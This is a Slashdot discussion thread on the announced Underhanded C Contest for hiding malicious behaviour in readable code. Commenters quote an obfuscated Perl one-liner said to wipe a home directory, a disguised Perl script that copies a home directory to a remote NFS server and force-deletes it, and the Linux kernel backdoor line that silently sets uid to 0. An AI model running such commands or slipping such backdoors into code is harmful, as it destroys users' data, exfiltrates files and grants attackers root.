The First Annual Underhanded C Contest

Xcott Craver writes "We have just announced a new annual contest, the Underhanded C Contest, to write clear, readable, innocent-looking C code that implements malicious behavior. The object is to hide evil functionality that survives visual inspection of the source. The prize is beer."

Comment removed

[account_deleted]

Comment removed based on user account deletion

This will work

[The+Original+Yama]

People will do anything for beer! Who needs speech when you're gulping down a cold lager?

Re:This will work

[isny]

Based on past experience, free beer is usually the first step toward free speech.

in other words...

[beta-guy]

kill the brain cells that made innocent looking malicous code :P

Re:in other words...

[grammar+fascist]

On a more serious note - they should rethink their prize. Not everyone drinks beer, and there are plenty of talented programmers who avoid it completely. In fact, the ones who do probably have more working brain cells to throw at the problem.

Yes, I know that must come as a shock, and most people here probably won't believe me...yet it's true.

(And just to head off the inevitable nutcase looking for a Score:5, Funny: no, replacing the prize with free pr0n isn't going to cut it. :p)

Re:What are the legal ramifications of this?

Pussy.

It's a bad idea

Count on the likes of Sun, Microsoft, and anyone else selling a non-C language to pounce on this as a marketing opportunity.

C is a superb language. Why besmirch its reputation with a contest to make it seem as untrustworthy as possible?

Re:It's a bad idea

[Catamaran]

C gives you just enough rope to hang yourself.

Java gives you a polished floor on which you can slip and break your neck.

C++ gives you a thermo-nuclear device.

Re:It's a bad idea

[dcam]

You accidently create a dozen instances of yourself and shoot them all in the foot. Providing emergency medical assistance is impossible since you can't tell which are bitwise copies and which are just pointing at others and saying "That's me, over there."

Source

I think I might win

[numbware]

#include
main()
{
printf("Hello World");
}

Seemingly harmless, right? Wrong. It's still in devlopment, but think about it. You should have to greet the world before you destroy it. :)

Re: This year's challenge

[ErichTheWebGuy]

Any open-source steganography programs

Why, yes! http://sourceforge.net/projects/steghide/

Re:What are the legal ramifications of this?

[anthony_dipierro]

The authorities start a contest such as this, an unsuspecting programmer submits a malicious program, and he or she is arrested and charged with a variety of computer crimes.

What computer crimes would be broken?

Frankly, I won't participate in this contest considering the current legal state of America.

No, you won't participate because of yor current state of paranoia over the legal state of America.

like this?

[LiquidCoooled]

#include stuff.h
void main()
{
/* nothing / */ /* to see / * here */
/* whats * / challenging / * about */
/* this */ /* there / is no */ evil /*
screensaver(); * function */ /* here
anyone that thinks there is * / needs */
/* their / * / eyes testing */ ();
}

585

Re:like this?

[Dun+Malg]

Nice idea, but it doesn't look innoucuous. It looks like a trick. I think the contest is for code the equivalent of a razor blade in a nice looking apple, rather than a razor blade hidden in a pile of clearly marked rat poison.

Attack the Compiler

[LionKimbro]

Why attack the source code when you can instead attack the compiler?

You need only attack the compiler, or the linker, or the interpreter.

Here you go

[titzandkunt]

Just tuck it away in a commonly used header file, use touch to restore the last date/time of modification, and you're all set.

#define void int

Hours & hours of irritation & confusion!

T&K.

Re:What are the legal ramifications of this?

[bighoov]

Can you even breathe in that tinfoil cocoon?

Story is just plain bad

[typical]

Everyone knows that it is possible to write malicious code in C. That's just because C gives you the near utmost control over your system, and does not discrminiate based on human emotions like "good", "bad", and "malicious". Perhaps a better idea would have been to try to write malicious code in a language such as Java, which tries to prevent a programmer from writing such code. That would be a real challenge.

Yeah, I just flip the "+good +bad -malicious" flags on javac when I want to trust code. Come on, that's ridiculous.

This is not a hard task, but it's kind of stupid, on the order of "who can break into the most computers today" (I dunno, who can run nmap the longest?)

There are so many *interesting* things that could be done as a programming contest, and the submitter chose something that's a pain in the ass for other people, doesn't really challenge the brain ("shortest version of X"), and can't be used for much other than bogus arguments that "C is dangerous" or the obvious card, "Open Source is insecure" (you can look at the much larger sample set of SourceForge and the lack of Trojans implanted and later discovered).

The number of *interesting* security stories that could have challenged people and been useful is legion. "Can we have a system that is unbreakable and does X", (followed by the inevitable followup posts where people punch holes in the design) or other things. You could have asked "How can OSS projects avoid allowing malicious code being sumitted?", which would have started an interesting set of threads from people who work on proof-carrying code, would have taught readers something, and maybe provided improved security for the world at large. Instead, we're going to see a handful of bad, obfuscated C, and a bunch of halfassed arguments against C and OSS, neither of which has much connection with reality. There will be some language arguments, where someone says "we should use [LANGUAGE_WITH_BOUNDSCHECKING]", some security guy that will point out that this doesn't begin to avoid stopping malicious code, someone will make some stupid arguments about how their favorite OS is more secure than anyone else's, we'll get some rehash of NX features that have been done time and time again on Slashdot...seriously, goddammit. The day someone makes a knockoff of Slashdot that's a bit more computer-science oriented and isn't solely aimed at producing the same tired old trolling every day is the day I jump ship.

Re:Story is just plain bad

[schotter]

"The day someone makes a knockoff of Slashdot that's a bit more computer-science oriented and isn't solely aimed at producing the same tired old trolling every day"

Have you seen Technocrat.net? Looks to be just starting, but I'm already impressed: slashdot ran an article on a nanotech textiles protest - technocrat ran one on a group of scientists demonstrating a refined iteration of a carbon nanotube CPU. Comments are on-topic too, touch wood.

(Or there's always ars for CS stuff, but they're hardly a /. knockoff.)

Re:Seems a bit like those hacking contests

[numbski]

This is worse than the people that go around obfuscated perl. At least then you KNOW they're trying to hide something. I mean, you remember this?

perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{~" -;;s;;$_;see'

Don't run that. :P Unless you really don't like your home directory. I remember someone tore it down and dissected it, but the point is that if you can "hide it in broad daylight, then it is far more dangerous. :)

I mean I could do something like this:

# When do you want it done?
$today="sudo";
$yesterday="su -c";

# Define our globals
$superman="ls";
$wonderwoman="rm"
$batm an="cp";
$aquaman="mv";

#define some important flags
$blows="-r";
$maims="-p";
$chunks="-f";
$defeats="-s";

#define some targets
$your_mom="/";
$your_dad="/usr";
$your_ sister="~";
$your_teacher="/bin";
$hell="/dev/nu ll";
$heaven="/dev/random";
$skyhigh="nfs://myse rver/myhome";

#....later, back at Superfriends Headquarters

`$batman $blows $your_sister $skyhigh`;
`$wonderwoman $blows $chunks $on $your_sister`;
`$today $batman $and $your_mom $think $heaven $is $a $great $place $for $your_sister`;
#Would you like to see the rest of the story?
#print "Would you like to hear more? Please type your password to continue!";

The superfriends save the day again.

Why?

[simulacrum25]

Hacking was never about malicious behaviour, it was about learning and understanding. Granted, much of what one learned could be applied in malicious ways, but that wasn't the goal. Coding contests whether they be geared towards obfuscation or speed are still learning endeavors.

Who is behind this and what is their motivations? What will they do with the ideas submitted in this contest? In a day of professional computer hackers, this is not a contest to have.

Re:Why?

[Nf1nk]

To find subtley malicous code in an open source project, we first must know what it looks like. Having contests like these creates a sample base of dangerous code and clever tricks to read and learn from.
It is sort of like the computer version of a bomb squad.

Re:Why?

[Xcott+Craver]

Who is behind this and what is their motivations?

Is Google down? Okay, I updated the faq to tell you who we are.

Also, we never said anything about hackers. Nowhere have we associated hacking with malicious behavior. And I sincerly hope this will be a learning experience for all involved. I, in particular, will probably learn a thing or two about running next year's contest.

Xcott

Diebold Hiring the winner!

[tvlinux]

Help Wanted:
Diebold needs new programmers. If you have what it takes to hide "winning" code in our election machines. Apply to Diebold Careers

Re:Indeed. This could be a field day for Java and

[Xcott+Craver]

Correct, making it look valid is the main purpose of the contest.

Please check out the contest page: the "evil" behavior is not something java would prevent you from doing. We're not talking about crashing a computer or gaining root access, but performing a data processing task incorrectly. It's entirely problem state.

That being said, I chose C because it does permit more tricks along the lines of stack smashing and type mismatches. The winners of the obfuscated V contest used techniques like this to conceal their evil behavior, so I feel this would give people more freedom to get creative.

Finally, this is not meant to slam C, or open source, or any such like. I can't imagine how anyone can look at this contest and see it as an argument for less openness.

Xcott

Subtlety

[Dirtside]

The prize is beer.

...but the beer is poisoned!

An example from years ago

[exp(pi*sqrt(163))]

There was a bug in the Watcom compiler for DOS many years ago. As a bug report I sent them a piece of code something like:

char *s = "Fortune coookie";
int *p = (char *)s;
for (i = 0; i<4; ++i) {
putchar(((char *)p)[i]);
}

Looks innocent enough. But actually it actually printed an obscenity. There was a bug in the pointer addition code generated by the compiler so that even though (char *)p was a pointer to type char it still used sizeof(int) to index into the array and so it printed every 4th character. (And that explains why I used three o's.)

Re:An example from years ago

[exp(pi*sqrt(163))]

It was for DOS4GW but I think you're being pedantic.

Some dude from Microsoft is gonna win...

[swillden]

He'll submit the source code to IE.

here's my entry

[thdexter]

#include <notavirus.h>
#include <seriouslyitisnt.h>

So long as they don't check notavirus.h I think I'm in the clear for visual inspection.

how's this?

[spongman]

int main () { WinExec ("iexplore.exe"); }

Linux Kernel Backdoor Attempt

[Johnny+Hardcore]

This reminds me about the attempt at inserting a backdoor in the linux kernel to gain root access. If they found out who did this, maybe he should get the free beer? ;)

The attempt was trying to insert

if ((options == (__WCLONE|__WALL)) && (current->uid = 0))

inside a function. Note that (current->uid = 0) is not testing but rather sets the UID to zero (and the surrounding brackets avoid the GCC warning).

So The Hard Part Is To

[Master+of+Transhuman]

"write clear, readable, innocent-looking C code", right?

Wow, nobody's going to win this one.

Obligatory simpsons paraphrase

[Sentry21]

Programmer: 'Take this source code, but beware! It carries a terrible curse!'
Judge: 'That's bad.'
Programmer: 'But it's optimized for PowerPC!'
Judge: 'That's good!'
Programmer: 'PowerPC is also cursed.'
Judge: 'That's bad.'
Programmer: 'But you get your choice of operating systems!'
Judge: 'That's good!'
Programmer: 'The operating systems run on Intel.' *pause* 'That's bad.'
Judge: 'Can I go now?'

You're just not used to it.

[Tyler+Durden]

Problems: difficult to compile

A picky compiler is a blessing, not a curse. It's much easier to identify and fix compile errors than run-time errors.

difficult to convert to better languages (thank you preprocessor)

Meaningless troll.

encourages obfuscation

Unless the compiler is literally holding a gun to your head, this is meaningless. In C you have nearly limitless control to write your code the way you feel is clearest. If it came out obfuscated then you have nobody to blame but yourself.

some constructs are clearly tacked on and/or poorly implemented (switch), arbitrary nonorthogonality (struct, parens and brace usage, pointer/array declaration), shitty strings.

Tacked on? If you don't like the way constructs are set up then fine, that's your opinion. But if you read The C Programming Language you can tell that every single construct was scrutinized over for the proper balance of efficiency (why it makes sense to pass array parameters as pointers and structs as copies) and consistency (why data types are declared the way they are. Declaration and use of data is made to match.) Do you honestly believe the creators/first users of C, some of the greatest programmers who ever lived, really said, "Ahhh, fuck it. Let's just throw something together," when designing their own programming tools?

Most people who don't like C are really just saying they don't like low-level programming because that's what it was designed for, and that's what it's perfect for. Too many newbie programmers get used to some modern, flash-in-the-pan, all-things-to-all-people languages and when they are faced with the challenges of low-level languages rashly conclude that it's the language's fault they're having problems.

C is the perfect language for the job it was designed for. The same cannot be said for most more modern languages.

Re:You're just not used to it.

[csirac]

I think it is very odd you can't believe we're still using C in operating systems. What the other language are we going to use for this task?

Are you really going to want to wait 100s of milliseconds for a garbage collector to run at arbitrary intervals in your carefully word aligned DMA transaction code that needs to run within a matter of microseconds? And how exactly is Python, LISP, or any other interpreted/dynamic runtime compiled language going to be used to write a task scheduler or memory managment system worthy of being used in an OS kernel or embedded MCUs with barely 16KiB RAM?

I think you're quite bitter about having to use C for writing applications, which I can perfectly understand. As for what C is actually MEANT for, it does the job quite well. And yes, the preprocessor issues suck, and it would be nice to have Pascal strings, but there really is no alternative to C that I have seen for low-level programming. It makes computer science purists who think everyone should program in Haskell or LISP feel dirty, but it does the job very well. It sure beats writing directly in ASM.

Service Pack fixes it, but it's documented

[edalytical]

http://support.microsoft.com/?kbid=311486

Re:C is an awful language

[jejones]

Well...

C is good for what it was first used for: writing Unix. At least initially, it was mimimalistic; orthogonality took a back seat to ease of implementation. (See Gabriel's classic essay for details.)

(It's certainly not flawless. Any language that needs a utility like cdecl to make declarations understandable has problems, and there should've been a Boolean type from the beginning. It would be nice if char (which should be whatever represents a glyph on the target system) weren't conflated with short short int. Basically, if C were in your back yard, it would be declared an "attractive nuisance.")

I think the authors of The Art of Unix Programming wisely recognize that C, like any other tool, should be used only where appropriate. (Sorry if that's tautological, but I can't think of a better way to put it.)